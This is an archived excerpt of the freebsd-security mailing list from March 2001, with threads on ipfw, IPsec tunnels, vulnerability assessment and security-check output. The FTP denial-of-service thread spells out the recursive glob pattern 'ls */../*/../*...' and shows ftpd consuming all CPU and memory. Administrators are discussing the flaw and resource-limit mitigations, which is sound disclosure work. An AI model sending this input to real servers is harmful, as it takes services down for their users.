Cambridge, Ontario Canada www.sentex.net/mike
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 15:15:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id 551A037B718
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:15:27 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id AAA62716;
Fri, 16 Mar 2001 00:15:14 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
Cc: nate@yogotech.com (Nate Williams),
adam@algroup.co.uk (Adam Laurie), ronan@melim.com.br (Ronan Lucio),
security@FreeBSD.ORG
Subject: Re: Port 113
References: <200103152258.OAA51686@gndrsh.dnsmgr.net>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 16 Mar 2001 00:15:13 +0100
In-Reply-To: "Rodney W. Grimes"'s message of "Thu, 15 Mar 2001 14:58:00 -0800 (PST)"
Message-ID: <xzpu24uoc8u.fsf@flood.ping.uio.no>
Lines: 12
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
"Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net> writes:
> IIRC one of the problems I saw was that the icmp reset packet was
> created with the address of the ipfw box, which caused it to be
> ignored by the sending host. Don't know if that ever got fixed or
> not though.
Uh, you're probably right. I mostly run ipfw on the leaf host, so I
wouldn't get hit by that bug.
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 15:17: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www3.infolink.com.br (www3.infolink.com.br [200.255.108.4])
by hub.freebsd.org (Postfix) with ESMTP id 68E5B37B719
for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 15:17:02 -0800 (PST)
(envelope-from apina@infolink.com.br)
Received: from infolink.com.br (unverified [200.255.108.32]) by www3.infolink.com.br
(Vircom SMTPRS 4.2.181) with SMTP id <B0024487301@www3.infolink.com.br> for <freebsd-security@freebsd.org>;
Thu, 15 Mar 2001 20:16:59 -0300
From: "Antonio Carlos Pina" <apina@infolink.com.br>
Reply-To: apina@infolink.com.br
To: freebsd-security@freebsd.org
Date: Thu, 15 Mar 2001 20:17:00 est
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-id: <3ab14d6c.31f.0@infolink.com.br>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hello,
Actually I think this highly depends on HOW MANY files and
directories FTPD can access.
I didn't see any damage with a jailed FTPD with 1 directoy and 2
files.
Best Regards,
>I think so. With 4.2-STABLE in an anonymous session we got 100% CPU
>until we kill ftpd.
>
>> > FreeBSD isn't listed, but also vulnerable, at least with the
FTPd in
>> > -STABLE.
>>
>> Sure?
>>
>> With 4.2-REL:
>>
>> Remote system type is UNIX.
>> Using binary mode to transfer files.
>> ftp> ls
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>> 150 Opening ASCII mode data connection for '/bin/ls'.
>> 226 Transfer complete.
>> ftp>
>> ftp> ls
>> 150 Opening ASCII mode data connection for '/bin/ls'.
>> total 13
>> -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc
>> drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm
>> -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history
>> -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login
>>
>> [Everything normal, I mean]
>>
>>
>> Regards.
>>
>> Fernando P. Schapachnik
>> Administraci=F3n de la red
>> VIA NET.WORKS ARGENTINA S.A.
>> fschapachnik@vianetworks.com.ar
>> Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA
>>
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-security" in the body of the message
>>
>
>--
> Frederico A C Neves Registro .br - R.Pio XI, 1500
> +55 11 3838-4130 S=E3o Paulo, SP, Brazil - 05468-901
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>
Cordialmente,
Antonio Carlos Pina
apina@infolink.com.br
Diretor de Tecnologia (CTO)
http://www.infolink.com.br
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 15:44:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tahoe.cinenet.net (ns1.cinenet.net [198.147.76.65])
by hub.freebsd.org (Postfix) with ESMTP id D16C837B718
for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 15:44:15 -0800 (PST)
(envelope-from mikey@singingtree.com)
Received: from ember (pool.207.151.148.219.cinenet.net [207.151.148.219])
by tahoe.cinenet.net (8.9.3/8.9.3) with SMTP id PAA08072
for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 15:44:14 -0800 (PST)
Message-ID: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>
From: "Michael A. Dickerson" <mikey@singingtree.com>
To: <freebsd-security@freebsd.org>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Date: Thu, 15 Mar 2001 15:42:29 -0800
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> 4.1 from Aug 10th is hurt by it.
>
> ---Mike
>
So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
cpu and memory use grows until the kernel runs out of swap space and starts
killing processes. This was an ftp connection with a regular username and
password, in an average home directory.
M.D.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 15:52:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20])
by hub.freebsd.org (Postfix) with ESMTP id 7CC1D37B718
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:52:36 -0800 (PST)
(envelope-from bright@fw.wintelcom.net)
Received: (from bright@localhost)
by fw.wintelcom.net (8.10.0/8.10.0) id f2FNqYY22370;
Thu, 15 Mar 2001 15:52:34 -0800 (PST)
Date: Thu, 15 Mar 2001 15:52:34 -0800
From: Alfred Perlstein <bright@wintelcom.net>
To: Antonio Carlos Pina <apina@infolink.com.br>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315155234.G29888@fw.wintelcom.net>
References: <3ab14d6c.31f.0@infolink.com.br>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3ab14d6c.31f.0@infolink.com.br>; from apina@infolink.com.br on Thu, Mar 15, 2001 at 08:17:00PM -0500
X-all-your-base: are belong to us.
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
* Antonio Carlos Pina <apina@infolink.com.br> [010315 15:17] wrote:
> Hello,
>
> Actually I think this highly depends on HOW MANY files and
> directories FTPD can access.
>
> I didn't see any damage with a jailed FTPD with 1 directoy and 2
> files.
The only reason you didn't see a problem was because you had
only one directory.
The DoS works via a simple mechanism.
if you have a dir with two directories in it 'a' and 'b'
*/../ -> a/.. b/..
*/../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/..
basically for each ../*/ you do a power N where N is the number
of directories.
How could this be fixed? I think it's somewhat simple,
have glob() maintain a truncated version of paths and
make sure that any collisions are detected.
Of course this is only speculation since I haven't looked
at the code.
--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 19:38:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
by hub.freebsd.org (Postfix) with ESMTP id 1A30237B727
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 19:38:24 -0800 (PST)
(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
by shorty.ahpcns.com (Postfix) with ESMTP
id 041EA3A2DD; Thu, 15 Mar 2001 21:38:20 -0600 (CST)
Message-ID: <3AB18AAC.9069CBF2@ahpcns.com>
Date: Thu, 15 Mar 2001 21:38:20 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Mike Burgett <mburgett@awen.com>
Cc: "freebsd-security@FreeBSD.ORG" <freebsd-security@FreeBSD.ORG>
Subject: Re: IPSEC tunnel without gif?
References: <200103150440.f2F4eZB25117@dragon.awen.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Mike Burgett wrote:
> On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote:
>
> >The gateway that received the pings was transmitting ARP
> >requests but strangely, it was trying to get the hardware
> >address of the other tunnel endpoint rather than that of
> >the router in the middle. Since the ARP requests were never
> >answered, the ping response was never transmitted.
>
> This sounds an awful lot like:
>
> http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079
>
> I added a static arp entry for my router awhile back to work around this
> very thing.
>
> Thanks,
> Mike
Yup that's it. I got the same thing testing with a straight (no ipsec) gif
tunnel too. Are you running this in a "production" environment or just
playing with it? Has it proven reliable with the static arp entry? I was
pleasantly surprised to find that I didn't have any PMTUD problems today
(with ipsec up) like I did with PPTP.
Thanks ...jgm
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 21:29:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from coconut.itojun.org (coconut.itojun.org [210.160.95.97])
by hub.freebsd.org (Postfix) with ESMTP id 2269937B718
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 21:29:53 -0800 (PST)
(envelope-from itojun@itojun.org)
Received: from kiwi.itojun.org (localhost.itojun.org [127.0.0.1])
by coconut.itojun.org (8.9.3+3.2W/3.7W) with ESMTP id OAA19429;
Fri, 16 Mar 2001 14:29:36 +0900 (JST)
To: jomor <jomor@ahpcns.com>
Cc: Mike Burgett <mburgett@awen.com>,
"freebsd-security@FreeBSD.ORG" <freebsd-security@FreeBSD.ORG>
In-reply-to: jomor's message of Thu, 15 Mar 2001 21:38:20 CST.
<3AB18AAC.9069CBF2@ahpcns.com>
X-Template-Reply-To: itojun@itojun.org
X-Template-Return-Receipt-To: itojun@itojun.org
X-PGP-Fingerprint: F8 24 B4 2C 8C 98 57 FD 90 5F B4 60 79 54 16 E2
Subject: Re: IPSEC tunnel without gif?
From: itojun@iijlab.net
Date: Fri, 16 Mar 2001 14:29:36 +0900
Message-ID: <19427.984720576@coconut.itojun.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>> >The gateway that received the pings was transmitting ARP
>> >requests but strangely, it was trying to get the hardware
>> >address of the other tunnel endpoint rather than that of
>> >the router in the middle. Since the ARP requests were never
>> >answered, the ping response was never transmitted.
so you are seeing ARP for tunnel inner addresses?
http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85
should fix the above issue. not sure about freebsd merge status.
itojun
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 21:59:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
by hub.freebsd.org (Postfix) with ESMTP id A4BA637B718
for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 21:59:13 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 596A466B09; Thu, 15 Mar 2001 21:59:13 -0800 (PST)
Date: Thu, 15 Mar 2001 21:59:13 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: "Michael A. Dickerson" <mikey@singingtree.com>
Cc: freebsd-security@freebsd.org
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315215913.A70990@mollari.cthul.hu>
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="a8Wt8u1KmwUX3Y2C"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <004b01c0ada9$99f7b540$db9497cf@singingtree.com>; from mikey@singingtree.com on Thu, Mar 15, 2001 at 03:42:29PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--a8Wt8u1KmwUX3Y2C
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > 4.1 from Aug 10th is hurt by it.
> >
> > ---Mike
> >
>=20
> So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> cpu and memory use grows until the kernel runs out of swap space and star=
ts
> killing processes. This was an ftp connection with a regular username and
> password, in an average home directory.
I'm pretty sure (but haven't tested) that resource limits will prevent
this problem. Your ftpd shouldn't be using large amount of memory
under normal operating procedures, so you can set those to reasonable
values and not suffer any ill effects.
Kris
--a8Wt8u1KmwUX3Y2C
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6sauwWry0BWjoQKURAgE4AKCnmhjKbrNZCIMikQJWUftK81880ACeMt5a
pb6xBdAHKw1FylymJOF7y3k=
=YHjb
-----END PGP SIGNATURE-----
--a8Wt8u1KmwUX3Y2C--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 22:37:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
by hub.freebsd.org (Postfix) with ESMTP id A202237B718
for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 22:37:40 -0800 (PST)
(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19);
Thu, 15 Mar 2001 22:35:38 -0800
Received: (from cjc@localhost)
by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2G6bbD09511;
Thu, 15 Mar 2001 22:37:37 -0800 (PST)
(envelope-from cjc)
Date: Thu, 15 Mar 2001 22:37:36 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Kris Kennaway <kris@obsecurity.org>
Cc: "Michael A. Dickerson" <mikey@singingtree.com>,
freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315223736.C28471@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>; from kris@obsecurity.org on Thu, Mar 15, 2001 at 09:59:13PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Thu, Mar 15, 2001 at 09:59:13PM -0800, Kris Kennaway wrote:
> On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote:
> > > 4.1 from Aug 10th is hurt by it.
> > >
> > > ---Mike
> > >
> >
> > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100%
> > cpu and memory use grows until the kernel runs out of swap space and starts
> > killing processes. This was an ftp connection with a regular username and
> > password, in an average home directory.
>
> I'm pretty sure (but haven't tested) that resource limits will prevent
> this problem. Your ftpd shouldn't be using large amount of memory
> under normal operating procedures, so you can set those to reasonable
> values and not suffer any ill effects.
And this really does not have a lot directly to do with ftpd. Try,
$ ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/
At a command line and watch what the shell does. It's a general
globbing issue.
Anyway, as for ftpd, all a user can kill the ftpd process they are
using provided, as Kris points out, resource limits are set
appropriately. The user can do pretty much the same thing by logging
out.
--
Crist J. Clark cjclark@alum.mit.edu
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 23: 3:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from xocah.holywar.net (xocah.holywar.net [211.232.152.22])
by hub.freebsd.org (Postfix) with SMTP id C02A237B718
for <freebsd-security@freebsd.org>; Thu, 15 Mar 2001 23:03:18 -0800 (PST)
(envelope-from tsoi@xocah.holywar.net)
Received: (qmail 11778 invoked by uid 101); 16 Mar 2001 07:03:11 -0000
Date: Fri, 16 Mar 2001 16:03:11 +0900
From: "ho-sang, yoon" <tsoi@xocah.holywar.net>
To: freebsd-security@freebsd.org
Cc: Kris Kennaway <kris@obsecurity.org>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Message-ID: <20010315215913.A70990@mollari.cthul.hu>
Reply-To: tsoi@xocah.holywar.net
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Mmmm..
-----------------------------------------------------------------------------
$ uname -a
FreeBSD 4.2-STABLE
$ whoami
ftp
$ ulimit -a
cpu time (seconds, -t) unlimited
file size (512-blocks, -f) unlimited
data seg size (kbytes, -d) 524288
stack size (kbytes, -s) 65536
core file size (512-blocks, -c) 102400
max memory size (kbytes, -m) 20480
locked memory (kbytes, -l) 10240
max user processes (-u) 8211
open files (-n) 16424
sbsize (bytes, -b) unlimited
-----------------------------------------------------------------------------
---top-----------------------------------------------------------------------
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
6379 root 55 0 33360K 33016K RUN 0:40 86.02% 84.67% ftpd
[cut]
-----------------------------------------------------------------------------
and, have killed the pid in another terminal.
I don't think that the resourse limit does effect on this matter.
Or, am I something wrong?
--
no signature
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 1:25:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pooh.noc.u-net.net (pooh.noc.u-net.net [195.102.252.112])
by hub.freebsd.org (Postfix) with ESMTP id 9E46B37B71A
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 01:25:46 -0800 (PST)
(envelope-from peterm@vianetworks.co.uk)
Received: from localhost.noc.u-net.net ([127.0.0.1] helo=vianetworks.co.uk)
by pooh.noc.u-net.net with esmtp (Exim 3.20 #1)
id 14dqTx-000M5H-00
for freebsd-security@FreeBSD.ORG; Fri, 16 Mar 2001 09:25:13 +0000
Message-ID: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Date: Fri, 16 Mar 2001 09:25:13 +0000
From: Peter McGarvey <peterm@vianetworks.co.uk>
Organization: VIA NETdotWORKS
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security <freebsd-security@FreeBSD.ORG>
Subject: What's vunerable?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I've just inherited several FreeBSD boxes. The versions range from
3.2_RELEASE to 4.1_RELEASE.
On the BSD boxes I already maintain I cvsup and make world on a monthly
basis - or as soon as I see a CERT advisory that I know relates to
something that can bite. But the inherited boxes need a lot of work,
and I cannot guarantee to "The Powers That Be" that a make world wont
break the box.
What I really need to know is what vulnerabilities exist on each box -
so that I can present the boss with a risk assessment, and make him
decide if the box stays as is, or gets a make world.
So any advice anyone can give me, on how to find out what's vunerable
with any particular FreeBSD version, would be greatly appreciated.
--
TTFN, FNORD
Peter McGarvey
System Administrator
Network Operations, VIA Networks UK
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 1:34:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lastebil.math.ntnu.no (lastebil.math.ntnu.no [129.241.211.200])
by hub.freebsd.org (Postfix) with SMTP id BF21937B758
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 01:34:38 -0800 (PST)
(envelope-from perchrh@stud.math.ntnu.no)
Received: (qmail 28892 invoked by uid 23781); 16 Mar 2001 09:34:41 -0000
Date: Fri, 16 Mar 2001 10:34:41 +0100 (MET)
From: Per Christian Henden <perchrh@stud.math.ntnu.no>
X-X-Sender: <perchrh@lastebil.math.ntnu.no>
To: <freebsd-security@FreeBSD.ORG>
Subject: weird error messages (at least I don't understand them)
Message-ID: <Pine.GSO.4.33.0103161022470.28592-100000@lastebil.math.ntnu.no>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
My daily "security check output" (autogenerated mail sent to root, enabled
by default in freebsd) contains a variying number of lines just like this:
arp: unknown hardware address format (0x0800)
Is this something I should be worried about?
These entries (or something similar) also appears fairly frequently
(I replaced my real dns-name with "my.hostname.domain")
Checking for rejected mail hosts:
5 malvix.hist.no
2 my.hostname.domain
2 malvix.hist.no@my.hostname.domain
1 <malvix.hist.no!kan2na
1 <kan2na@
1 <kan2na%malvix.hist.no
1 <kan2na
1 <@myhostname.domain:kan2na@malvix.hist.no
This looks kinda suspicous to me, what could it mean?
I figured freebsd-security would be a fitting place to ask, since it's
about the output from the "freebsd security check" script.
--
Per Christian Henden, perchrh@stud.ntnu.no
---------------------
Most people wouldn't know music if it came up and bit them on the ass.
-- Frank Zappa
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 1:40: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202])
by hub.freebsd.org (Postfix) with ESMTP id CBA3237B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 01:40:04 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 5236166EAE; Fri, 16 Mar 2001 01:40:04 -0800 (PST)
Date: Fri, 16 Mar 2001 01:40:04 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Peter McGarvey <peterm@vianetworks.co.uk>
Cc: freebsd-security <freebsd-security@FreeBSD.ORG>
Subject: Re: What's vunerable?
Message-ID: <20010316014004.A86953@mollari.cthul.hu>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="ZGiS0Q5IWpPtfppv"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--ZGiS0Q5IWpPtfppv
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Fri, Mar 16, 2001 at 09:25:13AM +0000, Peter McGarvey wrote:
> I've just inherited several FreeBSD boxes. The versions range from
> 3.2_RELEASE to 4.1_RELEASE.
>=20
> On the BSD boxes I already maintain I cvsup and make world on a monthly
> basis - or as soon as I see a CERT advisory that I know relates to
> something that can bite. But the inherited boxes need a lot of work,
> and I cannot guarantee to "The Powers That Be" that a make world wont
> break the box.
>=20
> What I really need to know is what vulnerabilities exist on each box -
> so that I can present the boss with a risk assessment, and make him
> decide if the box stays as is, or gets a make world.
>=20
> So any advice anyone can give me, on how to find out what's vunerable
> with any particular FreeBSD version, would be greatly appreciated.
Read the advisories.
Kris
--ZGiS0Q5IWpPtfppv
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6sd9zWry0BWjoQKURAkV/AKDyVoMztBFCT/2lhHFyE7u9M9WQigCgmvNw
nu+GOtfOmqeRzeZ7zCkFe/I=
=Nghs
-----END PGP SIGNATURE-----
--ZGiS0Q5IWpPtfppv--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 1:40:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nevada.btk.za.net (nevada.btk.za.net [213.77.120.30])
by hub.freebsd.org (Postfix) with SMTP id CC61237B71E
for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 01:40:23 -0800 (PST)
(envelope-from freebsd@nevada.btk.za.net)
Received: (from freebsd@localhost)
by nevada.btk.za.net (8.11.1/8.11.1) id f2GAdsG26666
for freebsd-security@freebsd.org; Fri, 16 Mar 2001 10:39:54 GMT
(envelope-from freebsd)
Date: Fri, 16 Mar 2001 10:39:54 +0000
From: Lukasz Pawlik <freebsd@btk.za.net>
To: freebsd-security@freebsd.org
Subject: Invalid hostname
Message-ID: <20010316103954.A24855@btk.za.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hello,
I'd like to ask for a little help. I dont understand one record
which is printed by last.
ash ttyp2 invalid hostname Ndz 11 Mar 19:07 - 20:13 (01:06)
What the 'invalid hostname' is? If DNS failed, why there is no ip?
Can someone explain me?
Lukasz
--
Lukasz Pawlik
e-mail:Lukasz.Pawlik@kielce.wox.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 2: 7: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from closed-networks.com (shady.org [195.153.248.241])
by hub.freebsd.org (Postfix) with SMTP id 3ADB537B719
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 02:07:07 -0800 (PST)
(envelope-from marcr@closed-networks.com)
Received: (qmail 88671 invoked by uid 1000); 16 Mar 2001 10:10:11 -0000
Date: Fri, 16 Mar 2001 10:10:11 +0000
From: Marc Rogers <marcr@shady.org>
To: freebsd-security@FreeBSD.ORG
Subject: Re: What's vunerable?
Message-ID: <20010316101011.U10016@shady.org>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>; from peterm@vianetworks.co.uk on Fri, Mar 16, 2001 at 09:25:13AM +0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hi
Point your browser at:
http://www.freebsd.org/security/#adv
All the info you need is there. My advise to you though is to
consider synchronising your boxes. It is far far easier to secure
several of the same thing than it is to secure lots of different
things.
Marc Rogers
Head of Network Operations & Security
EDC Group
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Mar 16 2:19:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from closed-networks.com (shady.org [195.153.248.241])
by hub.freebsd.org (Postfix) with SMTP id 766A137B718
for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 02:19:55 -0800 (PST)
(envelope-from marcr@closed-networks.com)
Received: (qmail 88777 invoked by uid 1000); 16 Mar 2001 10:23:02 -0000
Date: Fri, 16 Mar 2001 10:23:02 +0000
